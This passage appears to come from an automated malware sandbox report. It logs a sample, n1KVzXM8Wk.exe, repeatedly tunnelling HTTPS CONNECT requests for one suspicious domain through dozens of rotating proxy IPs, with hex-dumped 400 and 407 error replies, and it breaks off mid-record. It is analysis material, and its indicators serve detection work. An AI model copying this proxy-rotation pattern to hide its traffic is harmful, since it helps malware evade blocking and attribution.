                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      386192.168.2.45105472.195.114.16941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.336150885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      387192.168.2.451122132.148.130.78387216812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.347963095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.902710915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      388192.168.2.451082162.144.36.208278296812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.354269028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      389192.168.2.45103945.11.95.16550006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.370345116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      390192.168.2.451221104.20.179.187806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.370352030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.457427979 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      391192.168.2.45121145.196.151.23654326812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.370413065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.473954916 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Content-Length: 65
                                                                                                      Proxy-Authenticate: Basic realm="Proxy"
                                                                                                      Connection: close
                                                                                                      Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                                      Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      392192.168.2.4512205.161.98.204539356812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.370526075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.739432096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.146892071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.830439091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.030631065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      393192.168.2.451107116.202.235.157631356812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.370527029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.865663052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      394192.168.2.451222172.67.253.69806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.370960951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.458153963 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      395192.168.2.451123141.94.174.6334666812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.371721029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      396192.168.2.451235172.64.207.185806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.371901989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.473772049 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      397192.168.2.450961194.233.78.142423696812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.375890970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.146898985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      398192.168.2.45120851.222.241.157462866812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.376833916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.739449978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.146939993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      399192.168.2.451138107.181.141.7064676812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.383328915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.768939972 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                                      Proxy-Connection: close
                                                                                                      X-Webshare-Error: 407
                                                                                                      X-Webshare-Reason: invalidpassword
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Length: 121
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                                      Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      400192.168.2.451270162.159.242.109806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.387408018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.475235939 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      401192.168.2.451381202.159.107.174436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.389194012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      402192.168.2.451291172.67.231.3806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.416311026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.503618956 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      403192.168.2.451151107.181.132.18361616812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.416419029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.749660969 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                                      Proxy-Connection: close
                                                                                                      X-Webshare-Error: 407
                                                                                                      X-Webshare-Reason: invalidpassword
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Length: 121
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                                      Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      404192.168.2.451311185.238.228.67806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.418992996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.505924940 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      405192.168.2.451384202.159.107.174436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.429920912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      406192.168.2.451261154.12.253.232383386812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.429940939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.902822018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.334714890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.098843098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.537621975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.903764963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.271064043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.944200039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      407192.168.2.45126568.169.60.22083806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.429984093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      408192.168.2.451175141.94.174.6456206812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.430249929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      409192.168.2.451275162.241.46.6460976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.430249929 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.902751923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.334781885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      410192.168.2.45129650.233.111.162321006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.430536032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      411192.168.2.451202174.64.199.8241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.430696964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      412192.168.2.450689199.102.105.24241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.431878090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      413192.168.2.45131766.85.30.138806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.431883097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.865622044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.365710974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.178386927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
